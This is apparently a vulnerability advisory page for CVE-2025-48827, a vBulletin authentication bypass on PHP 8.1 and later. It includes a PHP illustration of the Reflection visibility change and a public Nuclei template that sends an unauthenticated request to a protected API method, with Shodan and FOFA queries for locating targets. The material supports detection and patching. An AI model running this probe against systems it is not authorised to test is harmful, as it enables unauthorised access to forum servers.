CVE-2025-48827: vBulletin 5.0.0-6.0.3 - Authentication Bypass

Date: 2025-08-01 | Affected software: vBulletin | PoC: public

Vulnerability description

vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass: on PHP 8.1 or later, protected API controller methods are reachable without authentication, letting unauthenticated attackers invoke them remotely. Starting with PHP 8.1, an internal change to the handling of ReflectionMethod::invoke() and similar methods means that PHP's Reflection API allows invocation of protected and private methods by default.
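
The PHP 8.1 behaviour change described above, as an added example (not code from vBulletin or from the template's author): a hypothetical controller and two dispatchers, one that relies on Reflection to reject non-public methods and one that checks visibility itself. All class, method and function names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical API controller: one method meant for remote callers, one internal helper.
class Example_Api_Ad
{
    public function listAds(): array
    {
        return ['banner-1'];
    }

    protected function renderInternal(string $template): string
    {
        return 'rendered:' . $template;
    }
}

// Weak dispatcher: trusts Reflection to refuse non-public methods.
// On PHP < 8.1, invokeArgs() throws ReflectionException for a protected method
// unless setAccessible(true) was called first. On PHP >= 8.1 the call succeeds.
function dispatchWeak(object $controller, string $method, array $args)
{
    $ref = new ReflectionMethod($controller, $method);
    return $ref->invokeArgs($controller, $args);
}

// Hardened dispatcher: visibility is checked explicitly, so the result
// no longer depends on which PHP version runs the code.
function dispatchStrict(object $controller, string $method, array $args)
{
    $ref = new ReflectionMethod($controller, $method);
    if (!$ref->isPublic()) {
        throw new RuntimeException('method not exposed: ' . $method);
    }
    return $ref->invokeArgs($controller, $args);
}

// Run both dispatchers against the public and the protected method.
$api = new Example_Api_Ad();
foreach (['dispatchWeak', 'dispatchStrict'] as $dispatch) {
    foreach (['listAds' => [], 'renderInternal' => ['x']] as $method => $args) {
        try {
            $out = json_encode($dispatch($api, $method, $args));
            echo PHP_VERSION, " $dispatch($method): allowed -> $out\n";
        } catch (Throwable $e) {
            echo PHP_VERSION, " $dispatch($method): blocked (", get_class($e), ")\n";
        }
    }
}
```

Running the same file under a PHP release older than 8.1 and under 8.1 or later shows the weak dispatcher changing behaviour for the protected method while the strict one does not.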

PoC code [public]

id: CVE-2025-48827

info:
  name: vBulletin 5.0.0-6.0.3 - Authentication Bypass
  author: pszyszkowski
  severity: critical
  description: |
    vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass caused by unauthenticated access to protected API controllers on PHP 8.1 or later, letting unauthenticated attackers invoke protected methods remotely.Starting from PHP 8.1, due to an internal adjustment to handling of ReflectionMethod::invoke() and similar methods, it now allows — by default — invocation of protected / private methods when using PHP's Reflection API.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ before upgrading to PHP 8.1.
  reference:
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
  classification:
    epss-score: 0.74032
    epss-percentile: 0.98789
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-48827
    cwe-id: CWE-424
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2025,rce,vbulletin,intrusive,vkev

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /ajax/api/ad/wrapAdTemplate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        template={{rand_string}}&id_name={{rand_value}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
          - contains_all(body,'<div class=','ad_{{rand_value}}_inner','{{rand_string}}')
        condition: and
# digest: 490a0046304402200468d58a36ec43d5c5c384ae1164c8921791a5d7df787c04ae139718a59afd1d022022a2c5c9784083dd07d74e8739fe22f1c036bd659d5a7af2c105b44acab1a51e:922c64590222798bb761d5b6d8e72950
